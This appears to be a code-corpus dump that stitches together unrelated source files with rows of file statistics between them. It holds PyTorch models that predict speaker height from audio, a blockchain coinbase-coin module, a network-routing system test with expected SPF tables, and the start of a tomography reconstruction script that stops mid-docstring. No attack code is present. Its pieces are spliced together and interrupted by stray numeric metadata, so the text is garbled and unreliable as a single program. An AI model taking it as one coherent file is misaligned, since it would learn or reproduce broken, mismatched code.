    """Soft-attention pooling over the time axis of a (batch, features, time) tensor."""

    def __init__(self, lstm_h):
        super().__init__()
        self.attention = wavencoder.layers.SoftAttention(lstm_h, lstm_h)

    def forward(self, x):
        # Swap to (batch, time, features) before the attention pooling.
        return self.attention(x.transpose(1, 2))
class MultiScaleH(nn.Module):
    """Height-only multi-scale model: three CNN branches (kernels 3/5/7)
    over 40-dim spectral input feeding one height regression head. Unlike
    SpectralMultiScale, the third conv stage has no MaxPool (it was
    deliberately disabled in the original)."""

    def __init__(self, lstm_h):
        super().__init__()
        inp_dim = 40
        self.lstm_h = lstm_h

        def branch(kernel):
            # Two conv/pool stages plus one pool-free conv stage, then
            # attention pooling over time.
            return nn.Sequential(
                nn.BatchNorm1d(inp_dim),
                nn.Conv1d(inp_dim, lstm_h, kernel),
                nn.ReLU(),
                nn.BatchNorm1d(lstm_h),
                nn.MaxPool1d(2, 2),
                nn.Conv1d(lstm_h, lstm_h, kernel),
                nn.ReLU(),
                nn.BatchNorm1d(lstm_h),
                nn.MaxPool1d(2, 2),
                nn.Conv1d(lstm_h, lstm_h, kernel),
                nn.ReLU(),
                nn.BatchNorm1d(lstm_h),
                TransposeAttn(lstm_h)
            )

        self.cnn3 = branch(3)
        self.cnn5 = branch(5)
        self.cnn7 = branch(7)
        self.height_regressor = nn.Sequential(
            nn.Linear(3 * lstm_h, lstm_h),
            nn.ReLU(),
            nn.Linear(lstm_h, 1)
        )

    def forward(self, x):
        spec = x.squeeze(1)
        features = torch.cat(
            [net(spec).view(-1, self.lstm_h) for net in (self.cnn3, self.cnn5, self.cnn7)],
            1,
        )
        return self.height_regressor(features)
class Wav2VecLSTMH(nn.Module):
    """Height-only model: fully frozen Wav2Vec encoder + LSTM with
    last-time-step pooling and a linear regression head."""

    def __init__(self, lstm_h, lstm_inp=512):
        super().__init__()
        self.encoder = wavencoder.models.Wav2Vec(pretrained=True)
        # The pretrained encoder is entirely frozen here (no fine-tuned layers,
        # unlike Wav2VecLSTM).
        for param in self.encoder.parameters():
            param.requires_grad = False
        self.lstm = nn.LSTM(lstm_inp, lstm_h, batch_first=True)
        self.height_regressor = nn.Linear(lstm_h, 1)

    def forward(self, x):
        # Drop the channel dimension; presumably (batch, 1, samples). TODO confirm.
        wav = x.squeeze(1)
        feats = self.encoder(wav)
        outputs, _ = self.lstm(feats.transpose(1, 2))
        last_step = outputs[:, -1, :]
        return self.height_regressor(last_step)
class SpectralLSTMH(nn.Module):
    """Height-only model: batch-normalized 40-dim spectral input, two-layer
    LSTM with soft-attention pooling, MLP regression head."""

    def __init__(self, lstm_h):
        super().__init__()
        self.normalize = nn.BatchNorm1d(40)
        self.lstm = nn.LSTM(40, lstm_h, batch_first=True, num_layers=2)
        self.attention = wavencoder.layers.SoftAttention(lstm_h, lstm_h)
        self.height_regressor = nn.Sequential(
            nn.Linear(lstm_h, lstm_h),
            nn.ReLU(),
            nn.Linear(lstm_h, 1))

    def forward(self, x):
        spec = self.normalize(x.squeeze(1))
        lstm_out, _ = self.lstm(spec.transpose(1, 2))
        pooled = self.attention(lstm_out)
        return self.height_regressor(pooled)
| 32.501475
| 103
| 0.552641
| 1,406
| 11,018
| 4.112376
| 0.06899
| 0.121065
| 0.048253
| 0.050156
| 0.894154
| 0.889139
| 0.889139
| 0.885853
| 0.850398
| 0.847631
| 0
| 0.033826
| 0.318479
| 11,018
| 339
| 104
| 32.501475
| 0.736183
| 0.058359
| 0
| 0.845878
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.010753
| 0
| 0.139785
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be1ca7378afd4819c2e9608b28938a17a267e2d1
| 2,342
|
py
|
Python
|
chia/consensus/coinbase.py
|
Hydrangea-Network/hydrangea-blockchain
|
d15662329958dbdaa9cbd99733ba729f0e74ce54
|
[
"Apache-2.0"
] | 1
|
2022-03-15T06:41:49.000Z
|
2022-03-15T06:41:49.000Z
|
chia/consensus/coinbase.py
|
Hydrangea-Network/hydrangea-blockchain
|
d15662329958dbdaa9cbd99733ba729f0e74ce54
|
[
"Apache-2.0"
] | null | null | null |
chia/consensus/coinbase.py
|
Hydrangea-Network/hydrangea-blockchain
|
d15662329958dbdaa9cbd99733ba729f0e74ce54
|
[
"Apache-2.0"
] | null | null | null |
from blspy import G1Element
from chia.types.blockchain_format.coin import Coin
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.util.ints import uint32, uint64
from chia.wallet.puzzles.p2_delegated_puzzle_or_hidden_puzzle import puzzle_for_pk
def create_puzzlehash_for_pk(pub_key: G1Element) -> bytes32:
    """Return the tree hash of the standard pay-to-pubkey puzzle for *pub_key*."""
    puzzle = puzzle_for_pk(pub_key)
    return puzzle.get_tree_hash()
def pool_parent_id(block_height: uint32, genesis_challenge: bytes32) -> bytes32:
    """Deterministic parent coin id for the pool reward at *block_height*:
    first 16 bytes of the genesis challenge + the height as 16 big-endian bytes."""
    height_bytes = block_height.to_bytes(16, "big")
    return bytes32(genesis_challenge[:16] + height_bytes)
def community_parent_id(block_height: uint32, genesis_challenge: bytes32) -> bytes32:
    """Deterministic parent coin id for the community reward at *block_height*.

    NOTE(review): derived identically to pool_parent_id (same genesis-challenge
    half, same height encoding), so the two reward coins share a parent id at
    any given height — confirm this is intended.
    """
    height_bytes = block_height.to_bytes(16, "big")
    return bytes32(genesis_challenge[:16] + height_bytes)
def staking_parent_id(block_height: uint32, genesis_challenge: bytes32) -> bytes32:
    """Deterministic parent coin id for the staking reward at *block_height*.

    NOTE(review): derived identically to pool_parent_id — confirm the shared
    parent id across reward types is intended.
    """
    height_bytes = block_height.to_bytes(16, "big")
    return bytes32(genesis_challenge[:16] + height_bytes)
def farmer_parent_id(block_height: uint32, genesis_challenge: bytes32) -> bytes32:
    """Deterministic parent coin id for the farmer reward at *block_height*:
    uses the SECOND 16 bytes of the genesis challenge (distinguishing it from
    the pool reward's parent id) + the height as 16 big-endian bytes."""
    height_bytes = block_height.to_bytes(16, "big")
    return bytes32(genesis_challenge[16:] + height_bytes)
def timelord_parent_id(block_height: uint32, genesis_challenge: bytes32) -> bytes32:
    """Deterministic parent coin id for the timelord reward at *block_height*.

    NOTE(review): derived identically to pool_parent_id (first 16 challenge
    bytes), not like farmer_parent_id — confirm intended.
    """
    height_bytes = block_height.to_bytes(16, "big")
    return bytes32(genesis_challenge[:16] + height_bytes)
def create_pool_coin(block_height: uint32, puzzle_hash: bytes32, reward: uint64, genesis_challenge: bytes32):
    """Construct the pool reward Coin minted at *block_height*."""
    return Coin(pool_parent_id(block_height, genesis_challenge), puzzle_hash, reward)
def create_community_coin(block_height: uint32, puzzle_hash: bytes32, reward: uint64, genesis_challenge: bytes32):
    """Construct the community reward Coin minted at *block_height*."""
    return Coin(community_parent_id(block_height, genesis_challenge), puzzle_hash, reward)
def create_staking_coin(block_height: uint32, puzzle_hash: bytes32, reward: uint64, genesis_challenge: bytes32):
    """Construct the staking reward Coin minted at *block_height*."""
    return Coin(staking_parent_id(block_height, genesis_challenge), puzzle_hash, reward)
def create_farmer_coin(block_height: uint32, puzzle_hash: bytes32, reward: uint64, genesis_challenge: bytes32):
    """Construct the farmer reward Coin minted at *block_height*."""
    return Coin(farmer_parent_id(block_height, genesis_challenge), puzzle_hash, reward)
def create_timelord_coin(block_height: uint32, puzzle_hash: bytes32, reward: uint64, genesis_challenge: bytes32):
    """Construct the timelord reward Coin minted at *block_height*."""
    return Coin(timelord_parent_id(block_height, genesis_challenge), puzzle_hash, reward)
| 45.038462
| 114
| 0.799744
| 325
| 2,342
| 5.412308
| 0.150769
| 0.090961
| 0.073906
| 0.108016
| 0.836839
| 0.765208
| 0.765208
| 0.765208
| 0.765208
| 0.765208
| 0
| 0.053212
| 0.109308
| 2,342
| 51
| 115
| 45.921569
| 0.790029
| 0
| 0
| 0.28125
| 0
| 0
| 0.006405
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.34375
| false
| 0
| 0.15625
| 0.1875
| 0.84375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
5806515164c48ebe63dc086530a9dad87460890a
| 19,931
|
py
|
Python
|
tests/test_sys_3n_l0_l1_l2.py
|
tcaiazzi/rift-python
|
0d185547d6b37289e8a7e308cd1c4b78bc0fa3ef
|
[
"Apache-2.0"
] | null | null | null |
tests/test_sys_3n_l0_l1_l2.py
|
tcaiazzi/rift-python
|
0d185547d6b37289e8a7e308cd1c4b78bc0fa3ef
|
[
"Apache-2.0"
] | null | null | null |
tests/test_sys_3n_l0_l1_l2.py
|
tcaiazzi/rift-python
|
0d185547d6b37289e8a7e308cd1c4b78bc0fa3ef
|
[
"Apache-2.0"
] | null | null | null |
# System test: test_sys_3n_l0_l1_l2
# 3n_l0_l1_l2 = 3 nodes: level 0, level 1, and level 2
# Allow long test names
# pylint: disable=invalid-name
import os
from rift_expect_session import RiftExpectSession
from log_expect_session import LogExpectSession
def check_rift_node1_intf_up(res):
    """Expected RIFT state on node1 (configured level 2) while its adjacency
    to node2 over if1 is in 3-way state."""
    res.check_adjacency_3way(
        node="node1",
        interface="if1")
    res.check_rx_offer(
        node="node1",
        interface="if1",
        system_id="2",
        level=1,
        not_a_ztp_offer="(False///True)",  # Juniper lenient
        state="THREE_WAY",
        best="(True///False)",  # Juniper lenient
        best_3way="(True///False)",  # Juniper lenient
        removed="(False///True)",  # Juniper lenient
        removed_reason="(Level is leaf///Not a ZTP offer flag set///)")  # Juniper lenient
    res.check_tx_offer(
        node="node1",
        interface="if1",
        system_id="1",
        level=2,
        not_a_ztp_offer=False,
        state="THREE_WAY")
    res.check_level(
        node="node1",
        configured_level=2,
        hal="(1///None)",  # Juniper lenient
        hat="(1///None)",  # Juniper lenient
        level_value=2)
    # Southbound SPF reaches both other nodes and all their prefixes.
    expect_south_spf = [
        r"| 1 \(node1\) | 0 | | | | |",
        r"| 2 \(node2\) | 1 | 1 | | | if1",
        r"| 3 \(node3\) | 2 | 2 | | | if1",
        r"| 1.1.1.1/32 | 1 | 1 | | | |",
        r"| 2.2.2.2/32 | 2 | 2 | | | if1",
        r"| 3.3.3.3/32 | 3 | 3 | | | if1",
        r"| 1111:1111::/128 | 1 | 1 | | | |",
        r"| 2222:2222::/128 | 2 | 2 | | | if1",
        r"| 3333:3333::/128 | 3 | 3 | | | if1",
    ]
    # Northbound SPF contains only node1 itself (it is top of fabric).
    expect_north_spf = [
        r"| 1 \(node1\) | 0 | | | |",
        r"| 1.1.1.1/32 | 1 | 1 | | |",
        r"| 1111:1111::/128 | 1 | 1 | | |",
    ]
    res.check_spf("node1", expect_south_spf, expect_north_spf)
    # Destinations that must NOT appear in each SPF direction.
    for direction, destination in [
            ("south", "0.0.0.0/0"),
            ("south", "::/0"),
            ("north", "2"),
            ("north", "3"),
            ("north", "0.0.0.0/0"),
            ("north", "2.2.2.2/32"),
            ("north", "3.3.3.3/32"),
            ("north", "::/0"),
            ("north", "2222:2222::/128"),
            ("north", "3333:3333::/128")]:
        res.check_spf_absent("node1", direction, destination)
    expect_rib = [
        r"| 2.2.2.2/32 | South SPF | if1",
        r"| 3.3.3.3/32 | South SPF | if1",
        r"| 2222:2222::/128 | South SPF | if1",
        r"| 3333:3333::/128 | South SPF | if1",
    ]
    res.check_rib("node1", expect_rib)
    # (prefix, owner) pairs that must NOT be in node1's RIB.
    for prefix, owner in [
            ("0.0.0.0/0", "south-spf"),
            ("0.0.0.0/0", "north-spf"),
            ("1.1.1.1/32", "south-spf"),
            ("1.1.1.1/32", "north-spf"),
            ("2.2.2.2/32", "north-spf"),
            ("3.3.3.3/32", "north-spf"),
            ("::/0", "south-spf"),
            ("::/0", "north-spf"),
            ("1111:1111::/128", "south-spf"),
            ("1111:1111::/128", "north-spf"),
            ("2222:2222::/128", "north-spf"),
            ("3333:3333::/128", "north-spf")]:
        res.check_rib_absent("node1", prefix, owner)
def check_rift_node1_intf_down(res):
    """Expected RIFT state on node1 after its if1 has failed: the adjacency
    drops back to 1-way and all remote destinations disappear from SPF."""
    res.check_adjacency_1way(
        node="node1",
        interface="if1")
    res.check_rx_offer(
        node="node1",
        interface="if1",
        system_id="2",
        level=1,
        not_a_ztp_offer="(False///True)",  # Juniper lenient
        state="THREE_WAY",
        best=False,
        best_3way=False,
        removed=True,
        removed_reason="Hold-time expired")
    res.check_tx_offer(
        node="node1",
        interface="if1",
        system_id="1",
        level=2,
        not_a_ztp_offer=False,
        state="ONE_WAY")
    res.check_level(
        node="node1",
        configured_level=2,
        hal="None",
        hat="None",
        level_value=2)
    # Both SPF directions now contain only node1 itself.
    expect_south_spf = [
        r"| 1 \(node1\) | 0 | | | | |",
        r"| 1.1.1.1/32 | 1 | 1 | | | |",
        r"| 1111:1111::/128 | 1 | 1 | | | |",
    ]
    expect_north_spf = [
        r"| 1 \(node1\) | 0 | | | |",
        r"| 1.1.1.1/32 | 1 | 1 | | |",
        r"| 1111:1111::/128 | 1 | 1 | | |",
    ]
    res.check_spf("node1", expect_south_spf, expect_north_spf)
    # The same set of remote destinations must be absent both south and north.
    unreachable = [
        "2",
        "3",
        "0.0.0.0/0",
        "2.2.2.2/32",
        "3.3.3.3/32",
        "::/0",
        "2222:2222::/128",
        "3333:3333::/128",
    ]
    for direction in ("south", "north"):
        for destination in unreachable:
            res.check_spf_absent("node1", direction, destination)
def check_rift_node2_intf_up(res):
    """Expected RIFT state on node2 (level 1, the middle node) with 3-way
    adjacencies both north to node1 (if1) and south to node3 (if2)."""
    res.check_adjacency_3way(
        node="node2",
        interface="if1")
    res.check_adjacency_3way(
        node="node2",
        interface="if2")
    res.check_rx_offer(
        node="node2",
        interface="if1",
        system_id="1",
        level=2,
        not_a_ztp_offer=False,
        state="THREE_WAY",
        best=True,
        best_3way=True,
        removed=False,
        removed_reason="")
    res.check_rx_offer(
        node="node2",
        interface="if2",
        system_id="3",
        level=0,
        not_a_ztp_offer="(False///True)",  # Juniper lenient
        state="THREE_WAY",
        best=False,
        best_3way=False,
        removed=True,
        removed_reason="(Level is leaf///Not a ZTP offer flag set)")  # Juniper lenient
    res.check_tx_offer(
        node="node2",
        interface="if1",
        system_id="2",
        level=1,
        not_a_ztp_offer=False,
        state="THREE_WAY")
    res.check_tx_offer(
        node="node2",
        interface="if2",
        system_id="2",
        level=1,
        not_a_ztp_offer=False,
        state="THREE_WAY")
    res.check_level(
        node="node2",
        configured_level=1,
        hal=2,
        hat=2,
        level_value=1)
    expect_south_spf = [
        r"| 2 \(node2\) | 0 | | | | |",
        r"| 3 \(node3\) | 1 | 2 | | | if2",
        r"| 2.2.2.2/32 | 1 | 2 | | | |",
        r"| 3.3.3.3/32 | 2 | 3 | | | if2",
        r"| 2222:2222::/128 | 1 | 2 | | | |",
        r"| 3333:3333::/128 | 2 | 3 | | | if2",
    ]
    expect_north_spf = [
        r"| 1 \(node1\) | 1 | 2 | | | if1",
        r"| 2 \(node2\) | 0 | | | | |",
        r"| 0.0.0.0/0 | 2 | 1 | | | if1",
        r"| 2.2.2.2/32 | 1 | 2 | | | |",
        r"| ::/0 | 2 | 1 | | | if1",
        r"| 2222:2222::/128 | 1 | 2 | | | |",
    ]
    res.check_spf("node2", expect_south_spf, expect_north_spf)
    for direction, destination in [
            ("south", "1"),
            ("south", "0.0.0.0/0"),
            ("south", "1.1.1.1/32"),
            ("south", "::/0"),
            ("south", "1111:1111::/128"),
            ("north", "3"),
            ("north", "3.3.3.3/32"),
            ("north", "3333:3333::/128")]:
        res.check_spf_absent("node2", direction, destination)
    expect_rib = [
        r"| 0.0.0.0/0 | North SPF | if1",
        r"| 3.3.3.3/32 | South SPF | if2",
        r"| ::/0 | North SPF | if1",
        r"| 3333:3333::/128 | South SPF | if2",
    ]
    res.check_rib("node2", expect_rib)
    for prefix, owner in [
            ("0.0.0.0/0", "south-spf"),
            ("2.2.2.2/32", "south-spf"),
            ("2.2.2.2/32", "north-spf"),
            ("3.3.3.3/32", "north-spf"),
            ("::/0", "south-spf"),
            ("2222:2222::/128", "south-spf"),
            ("2222:2222::/128", "north-spf"),
            ("3333:3333::/128", "north-spf")]:
        res.check_rib_absent("node2", prefix, owner)
def check_rift_node2_intf_down(res):
    """Expected RIFT state on node2 after node1's if1 has failed: the
    adjacency to node1 drops to 1-way while the one to node3 stays 3-way,
    and the northbound default routes disappear."""
    res.check_adjacency_1way(
        node="node2",
        interface="if1")
    res.check_rx_offer(
        node="node2",
        interface="if1",
        system_id="1",
        level=2,
        not_a_ztp_offer="(False///True)",  # Juniper lenient
        state="THREE_WAY",
        best=False,
        best_3way=False,
        removed=True,
        removed_reason="Hold-time expired")
    res.check_rx_offer(
        node="node2",
        interface="if2",
        system_id="3",
        level=0,
        not_a_ztp_offer="(False///True)",  # Juniper lenient
        state="THREE_WAY",
        best=False,
        best_3way=False,
        removed=True,
        removed_reason="(Level is leaf///Not a ZTP offer flag set)")  # Juniper lenient
    res.check_tx_offer(
        node="node2",
        interface="if1",
        system_id="2",
        level=1,
        not_a_ztp_offer=False,
        state="ONE_WAY")
    res.check_tx_offer(
        node="node2",
        interface="if2",
        system_id="2",
        level=1,
        not_a_ztp_offer=False,
        state="THREE_WAY")
    res.check_level(
        node="node2",
        configured_level=1,
        hal=None,
        hat=None,
        level_value=1)
    expect_south_spf = [
        r"| 2 \(node2\) | 0 | | | | |",
        r"| 3 \(node3\) | 1 | 2 | | | if2",
        r"| 2.2.2.2/32 | 1 | 2 | | | |",
        r"| 3.3.3.3/32 | 2 | 3 | | | if2",
        r"| 2222:2222::/128 | 1 | 2 | | | |",
        r"| 3333:3333::/128 | 2 | 3 | | | if2",
    ]
    # With node1 gone, northbound SPF contains only node2 itself.
    expect_north_spf = [
        r"| 2 \(node2\) | 0 | | | | |",
        r"| 2.2.2.2/32 | 1 | 2 | | | |",
        r"| 2222:2222::/128 | 1 | 2 | | | |",
    ]
    res.check_spf("node2", expect_south_spf, expect_north_spf)
    for direction, destination in [
            ("south", "1"),
            ("south", "0.0.0.0/0"),
            ("south", "1.1.1.1/32"),
            ("south", "::/0"),
            ("south", "1111:1111::/128"),
            ("north", "1"),
            ("north", "3"),
            ("north", "0.0.0.0/0"),
            ("north", "3.3.3.3/32"),
            ("north", "::/0"),
            ("north", "3333:3333::/128")]:
        res.check_spf_absent("node2", direction, destination)
    expect_rib = [
        r"| 3.3.3.3/32 | South SPF | if2",
        r"| 3333:3333::/128 | South SPF | if2",
    ]
    res.check_rib("node2", expect_rib)
    for prefix, owner in [
            ("0.0.0.0/0", "south-spf"),
            ("0.0.0.0/0", "north-spf"),
            ("2.2.2.2/32", "south-spf"),
            ("2.2.2.2/32", "north-spf"),
            ("3.3.3.3/32", "north-spf"),
            ("::/0", "south-spf"),
            ("::/0", "north-spf"),
            ("2222:2222::/128", "south-spf"),
            ("2222:2222::/128", "north-spf"),
            ("3333:3333::/128", "north-spf")]:
        res.check_rib_absent("node2", prefix, owner)
def check_rift_node3_intf_up(res):
    """Expected RIFT state on node3 (level 0, leaf) with a 3-way adjacency
    north to node2 over if1."""
    res.check_adjacency_3way(
        node="node3",
        interface="if1")
    res.check_rx_offer(
        node="node3",
        interface="if1",
        system_id="2",
        level=1,
        not_a_ztp_offer=False,
        state="THREE_WAY",
        best=True,
        best_3way=True,
        removed=False,
        removed_reason="")
    res.check_tx_offer(
        node="node3",
        interface="if1",
        system_id="3",
        level=0,
        not_a_ztp_offer=False,
        state="THREE_WAY")
    res.check_level(
        node="node3",
        configured_level=0,
        hal=1,
        hat=1,
        level_value=0)
    # A leaf's southbound SPF contains only itself.
    expect_south_spf = [
        r"| 3 \(node3\) | 0 | | | | |",
        r"| 3.3.3.3/32 | 1 | 3 | | | |",
        r"| 3333:3333::/128 | 1 | 3 | | | |",
    ]
    # Northbound it sees node2 and the default routes node2 originates.
    expect_north_spf = [
        r"| 2 \(node2\) | 1 | 3 | | | if1",
        r"| 3 \(node3\) | 0 | | | | |",
        r"| 0.0.0.0/0 | 2 | 2 | | | if1",
        r"| 3.3.3.3/32 | 1 | 3 | | | |",
        r"| ::/0 | 2 | 2 | | | if1",
        r"| 3333:3333::/128 | 1 | 3 | | | |",
    ]
    res.check_spf("node3", expect_south_spf, expect_north_spf)
    for direction, destination in [
            ("south", "1"),
            ("south", "2"),
            ("south", "0.0.0.0/0"),
            ("south", "1.1.1.1/32"),
            ("south", "2.2.2.2/32"),
            ("south", "::/0"),
            ("south", "1111:1111::/128"),
            ("south", "2222:2222::/128"),
            ("north", "1"),
            ("north", "1.1.1.1/32"),
            ("north", "2.2.2.2/32"),
            ("north", "1111:1111::/128"),
            ("north", "2222:2222::/128")]:
        res.check_spf_absent("node3", direction, destination)
    expect_rib = [
        r"| 0.0.0.0/0 | North SPF | if1",
        r"| ::/0 | North SPF | if1",
    ]
    res.check_rib("node3", expect_rib)
    for prefix, owner in [
            ("0.0.0.0/0", "south-spf"),
            ("1.1.1.1/32", "south-spf"),
            ("1.1.1.1/32", "north-spf"),
            ("2.2.2.2/32", "south-spf"),
            ("2.2.2.2/32", "north-spf"),
            ("3.3.3.3/32", "south-spf"),
            ("3.3.3.3/32", "north-spf"),
            ("::/0", "south-spf"),
            ("1111:1111::/128", "south-spf"),
            ("1111:1111::/128", "north-spf"),
            ("2222:2222::/128", "south-spf"),
            ("2222:2222::/128", "north-spf"),
            ("3333:3333::/128", "north-spf"),
            ("3333:3333::/128", "south-spf")]:
        res.check_rib_absent("node3", prefix, owner)
def check_rift_node3_intf_down(res):
    """Expected RIFT state on node3 after node1's if1 has failed. Node3's own
    adjacency (to node2) is unaffected, so its state matches the 'up' case."""
    res.check_adjacency_3way(
        node="node3",
        interface="if1")
    res.check_rx_offer(
        node="node3",
        interface="if1",
        system_id="2",
        level=1,
        not_a_ztp_offer=False,
        state="THREE_WAY",
        best=True,
        best_3way=True,
        removed=False,
        removed_reason="")
    res.check_tx_offer(
        node="node3",
        interface="if1",
        system_id="3",
        level=0,
        not_a_ztp_offer=False,
        state="THREE_WAY")
    res.check_level(
        node="node3",
        configured_level=0,
        hal=1,
        hat=1,
        level_value=0)
    expect_south_spf = [
        r"| 3 \(node3\) | 0 | | | | |",
        r"| 3.3.3.3/32 | 1 | 3 | | | |",
        r"| 3333:3333::/128 | 1 | 3 | | | |",
    ]
    expect_north_spf = [
        r"| 2 \(node2\) | 1 | 3 | | | if1",
        r"| 3 \(node3\) | 0 | | | | |",
        r"| 0.0.0.0/0 | 2 | 2 | | | if1",
        r"| 3.3.3.3/32 | 1 | 3 | | | |",
        r"| ::/0 | 2 | 2 | | | if1",
        r"| 3333:3333::/128 | 1 | 3 | | | |",
    ]
    res.check_spf("node3", expect_south_spf, expect_north_spf)
    for direction, destination in [
            ("south", "1"),
            ("south", "2"),
            ("south", "0.0.0.0/0"),
            ("south", "1.1.1.1/32"),
            ("south", "2.2.2.2/32"),
            ("south", "::/0"),
            ("south", "1111:1111::/128"),
            ("south", "2222:2222::/128"),
            ("north", "1"),
            ("north", "1.1.1.1/32"),
            ("north", "2.2.2.2/32"),
            ("north", "1111:1111::/128"),
            ("north", "2222:2222::/128")]:
        res.check_spf_absent("node3", direction, destination)
    expect_rib = [
        r"| 0.0.0.0/0 | North SPF | if1",
        r"| ::/0 | North SPF | if1",
    ]
    res.check_rib("node3", expect_rib)
    for prefix, owner in [
            ("0.0.0.0/0", "south-spf"),
            ("1.1.1.1/32", "south-spf"),
            ("1.1.1.1/32", "north-spf"),
            ("2.2.2.2/32", "south-spf"),
            ("2.2.2.2/32", "north-spf"),
            ("3.3.3.3/32", "north-spf"),
            ("3.3.3.3/32", "south-spf"),
            ("::/0", "south-spf"),
            ("1111:1111::/128", "south-spf"),
            ("1111:1111::/128", "north-spf"),
            ("2222:2222::/128", "south-spf"),
            ("2222:2222::/128", "north-spf"),
            ("3333:3333::/128", "south-spf"),
            ("3333:3333::/128", "north-spf")]:
        res.check_rib_absent("node3", prefix, owner)
def check_log_node1_intf_up(les):
    # Verify in the RIFT log that node1's if1 LIE FSM reached the 3-way state.
    les.check_lie_fsm_3way("node1", "if1")
def check_log_node1_intf_down(les):
    # After if1 is administratively failed, node1's LIE FSM should time out
    # back to the 1-way state; the string is the CLI command expected in the log.
    les.check_lie_fsm_timeout_to_1way("node1", "if1", "set interface if1 failure failed")
def check_log_node2_intf_up(les):
    # node2 has two adjacencies (to node1 via if1, to node3 via if2);
    # both LIE FSMs must reach 3-way.
    les.check_lie_fsm_3way("node2", "if1")
    les.check_lie_fsm_3way("node2", "if2")
def check_log_node2_intf_down(les):
    # node2's if1 faces node1's failed interface, so its FSM times out to 1-way.
    les.check_lie_fsm_timeout_to_1way("node2", "if1", "set interface if1 failure failed")
def check_log_node3_intf_up(les):
    # Verify in the RIFT log that node3's if1 LIE FSM reached the 3-way state.
    les.check_lie_fsm_3way("node3", "if1")
def check_log_node3_intf_down(les):
    # Intentionally the same check as the "up" case: node3's adjacency is to
    # node2, which is presumably unaffected by node1's if1 failure, so the FSM
    # stays (or re-reaches) 3-way -- TODO confirm this is the intended assertion.
    les.check_lie_fsm_3way("node3", "if1")
def test_3n_l0_l1_l2():
    """System test for the 3-node chain topology (levels 0-1-2).

    Brings the topology up, verifies both adjacencies reach 3-way, fails
    node1's if1, verifies convergence on all three nodes, restores if1 and
    verifies re-convergence.  Nodes listed in the RIFT_PASSIVE_NODES
    environment variable (comma-separated) are run by an external RIFT
    implementation, so their checks are skipped.
    """
    passive_nodes = os.getenv("RIFT_PASSIVE_NODES", "").split(",")
    # Bring topology up
    les = LogExpectSession()
    res = RiftExpectSession("3n_l0_l1_l2")
    # Check that node1-node2 and node2-node3 adjacencies reaches 3-way
    if "node1" not in passive_nodes:
        check_rift_node1_intf_up(res)
        check_log_node1_intf_up(les)
    if "node2" not in passive_nodes:
        check_rift_node2_intf_up(res)
        check_log_node2_intf_up(les)
    if "node3" not in passive_nodes:
        check_rift_node3_intf_up(res)
        check_log_node3_intf_up(les)
    # The failure scenario only makes sense when node1 is under our control.
    if "node1" not in passive_nodes:
        # Bring interface if1 on node1 down
        res.interface_failure("node1", "if1", "failed")
        check_rift_node1_intf_down(res)
        check_log_node1_intf_down(les)
        if "node2" not in passive_nodes:
            check_rift_node2_intf_down(res)
            check_log_node2_intf_down(les)
        if "node3" not in passive_nodes:
            check_rift_node3_intf_down(res)
            check_log_node3_intf_down(les)
        # Bring interface if1 on node1 up again
        res.interface_failure("node1", "if1", "ok")
        check_rift_node1_intf_up(res)
        check_log_node1_intf_up(les)
        if "node2" not in passive_nodes:
            check_rift_node2_intf_up(res)
            check_log_node2_intf_up(les)
        if "node3" not in passive_nodes:
            check_rift_node3_intf_up(res)
            check_log_node3_intf_up(les)
    # TODO: add test cases for bringing interface node2-node3 down
    # Done
    res.stop()
| 37.748106
| 90
| 0.55075
| 2,914
| 19,931
| 3.539121
| 0.039121
| 0.138078
| 0.082129
| 0.117037
| 0.935906
| 0.918937
| 0.881703
| 0.866479
| 0.833317
| 0.79841
| 0
| 0.114496
| 0.255481
| 19,931
| 527
| 91
| 37.819734
| 0.580497
| 0.028398
| 0
| 0.800399
| 0
| 0
| 0.31927
| 0
| 0
| 0
| 0
| 0.001898
| 0
| 1
| 0.025948
| false
| 0.017964
| 0.005988
| 0
| 0.031936
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ed0951b2b614767116685a8cf4b7debb97306e6b
| 34,554
|
py
|
Python
|
doc/collection/APS_32ID/interlaced/recon.py
|
pengdada/timbir
|
c9bda62d2c45cc3860a2834dd82fdc5d529ce183
|
[
"BSD-3-Clause"
] | 10
|
2015-04-08T01:53:01.000Z
|
2021-01-12T17:06:06.000Z
|
doc/collection/APS_32ID/interlaced/recon.py
|
pengdada/timbir
|
c9bda62d2c45cc3860a2834dd82fdc5d529ce183
|
[
"BSD-3-Clause"
] | 13
|
2015-03-26T01:20:34.000Z
|
2017-02-24T15:38:09.000Z
|
doc/collection/APS_32ID/interlaced/recon.py
|
pengdada/timbir
|
c9bda62d2c45cc3860a2834dd82fdc5d529ce183
|
[
"BSD-3-Clause"
] | 11
|
2015-06-03T20:01:41.000Z
|
2020-05-02T05:23:18.000Z
|
from __future__ import print_function
import os
import tomopy
import numpy as np
import sys
import reader
from TIMBIR_angles import gen_theta as _gen_theta_timbir
from TIMBIR_angles import calc_dropped_angles
# # Program settings

# MPI state.  Defaults are single-process; set_mpi() is expected to update
# them at runtime.
_usempi = False
_nprocs = 1
_rank = 0

# multiprocessing parameters forwarded to tomopy calls (set via set_mp()).
# only _nchunk is used in starting processes
# if _nchunk is None, _nchunk = (ndim - 1) // _ncore + 1
# where ndim = arr.shape[axis]
_ncore = None
_nchunk = None

# # Number of z slices in a single reconstruction run
# _z_recon_size = None
def set_mpi(usempi=True):
    """Enable or disable MPI and publish the settings at module scope.

    Fixes the original, which assigned ``_usempi`` and ``comm`` as function
